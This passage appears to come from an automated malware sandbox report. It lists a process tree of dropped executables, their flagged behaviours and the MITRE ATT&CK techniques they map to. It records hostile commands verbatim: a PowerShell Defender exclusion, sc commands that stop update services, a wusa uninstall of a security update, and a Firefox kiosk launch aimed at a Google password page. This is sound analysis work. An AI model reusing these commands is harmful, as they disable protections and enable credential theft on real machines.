        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1308
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3b8ae0d-7e81-43a0-ae6a-78006e7a4579} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" gpu
        6⤵
        
        PID:1528
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2177f85a-32fc-433e-afdb-c963e8ea5bf8} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" socket
        6⤵
        
        PID:364
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3200 -childID 1 -isForBrowser -prefsHandle 2996 -prefMapHandle 2904 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0937c804-354e-4edd-8473-c59f833bb01e} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
        6⤵
        
        PID:3228
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3976 -childID 2 -isForBrowser -prefsHandle 3972 -prefMapHandle 3968 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7261c77-90db-4023-8e64-2f49813041c5} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
        6⤵
        
        PID:5224
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4748 -prefMapHandle 4728 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {275dffee-513b-435e-b226-8e4f929155ce} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" utility
        6⤵
        Checks processor information in registry
        
        PID:6060
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5416 -prefMapHandle 5572 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66def290-aba5-434c-8ed9-ded173d2ff50} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
        6⤵
        
        PID:7164
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 4 -isForBrowser -prefsHandle 5752 -prefMapHandle 5756 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d083865e-b484-49b6-9d43-674497a9b172} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
        6⤵
        
        PID:5388
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6024 -childID 5 -isForBrowser -prefsHandle 5944 -prefMapHandle 5948 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fb760e7-5bbf-419b-84a9-c8b388979c02} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
        6⤵
        
        PID:5364
- - C:\Users\Admin\AppData\Local\Temp\1011751001\a059e40180.exe
    "C:\Users\Admin\AppData\Local\Temp\1011751001\a059e40180.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5208
- - C:\Users\Admin\AppData\Local\Temp\1011752001\6c3a0fbc6f.exe
    "C:\Users\Admin\AppData\Local\Temp\1011752001\6c3a0fbc6f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 956
      4⤵
      Program crash
      PID:3004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2184 -ip 2184
1⤵
PID:3552

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4024

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1924 -ip 1924
1⤵
PID:1252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1924 -ip 1924
1⤵
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3492 -ip 3492
1⤵
PID:3168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2020 -ip 2020
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 6848 -ip 6848
1⤵
PID:5684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6848 -ip 6848
1⤵
PID:5652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6848 -ip 6848
1⤵
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5868 -ip 5868
1⤵
PID:3564

C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3892
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6904
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5636
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5676
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5644
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5884
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5656
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:6928
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2168
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:7008
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:7016
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:7020
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6200
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3376

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2344

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4416

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:4236

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
1⤵
- Executes dropped EXE
PID:5284

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4796

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1088

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:6464

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
1⤵
- Executes dropped EXE
PID:6528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion